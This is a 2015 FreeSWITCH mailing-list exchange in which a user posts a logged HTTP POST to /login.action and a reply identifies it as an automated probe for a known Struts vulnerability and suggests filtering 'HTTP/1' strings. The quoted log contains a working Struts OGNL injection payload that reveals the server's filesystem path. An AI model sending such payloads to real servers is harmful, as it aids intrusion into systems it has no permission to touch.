<div dir="ltr"><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif">Looks like [likely automatic] attempt to exploit well-known Struts vulnerability.</div><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif">Nothing to worry about - you keep Freeswitch on port well known for presenting http-related services, you'll get more of it.</div><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif"><br></div><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif">Just block all strings containing '<span style="font-size:12.8px;font-family:arial,sans-serif">HTTP/1' and forget about that - Internet is full of bots and zombies.</span></div><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif"><span style="font-size:12.8px;font-family:arial,sans-serif"><br></span></div><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif"><span style="font-size:12.8px;font-family:arial,sans-serif">Best regards,</span></div><div class="gmail_default" style="font-family:'trebuchet ms',sans-serif"><span style="font-size:12.8px;font-family:arial,sans-serif">O.</span></div></div><div class="gmail_extra"><br><div class="gmail_quote">On 18 November 2015 at 17:02, Russell Treleaven <span dir="ltr"><<a href="mailto:rtreleaven@bunnykick.ca" target="_blank">rtreleaven@bunnykick.ca</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr"><div>I saw this on the freeswitch console months ago and did not get around to following up on it until now.</div><div>A freeswitch profile is listening on :8080</div><div><br></div><div>a.b.c.d = remote address</div><div>w.x.y.z = freeswitch address</div><div><br></div><div>What is this?</div><div>Is it a concern?</div><div><br></div><div>recv 607 bytes from tcp/[a.b.c.d]:4423 at 17:50:50.225319:</div><div> ------------------------------------------------------------------------</div><div> POST /login.action HTTP/1.1</div><div> User-Agent: Mozilla/5.0</div><div> Accept: */*</div><div> Content-Type: application/x-www-form-urlencoded</div><div> Host: w.x.y.z:8080</div><div> </div><div>Content-Length: 395</div><div> Expect: 100-continue</div><div> Connection: Keep-Alive</div><div> </div><div> redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}</div><div><br></div></div>
<br>_________________________________________________________________________<br>
Professional FreeSWITCH Consulting Services:<br>
<a href="mailto:consulting@freeswitch.org">consulting@freeswitch.org</a><br>
<a href="http://www.freeswitchsolutions.com" rel="noreferrer" target="_blank">http://www.freeswitchsolutions.com</a><br>
<br>
Official FreeSWITCH Sites<br>
<a href="http://www.freeswitch.org" rel="noreferrer" target="_blank">http://www.freeswitch.org</a><br>
<a href="http://confluence.freeswitch.org" rel="noreferrer" target="_blank">http://confluence.freeswitch.org</a><br>
<a href="http://www.cluecon.com" rel="noreferrer" target="_blank">http://www.cluecon.com</a><br>
<br>
FreeSWITCH-users mailing list<br>
<a href="mailto:FreeSWITCH-users@lists.freeswitch.org">FreeSWITCH-users@lists.freeswitch.org</a><br>
<a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" rel="noreferrer" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" rel="noreferrer" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
<a href="http://www.freeswitch.org" rel="noreferrer" target="_blank">http://www.freeswitch.org</a><br></blockquote></div><br></div>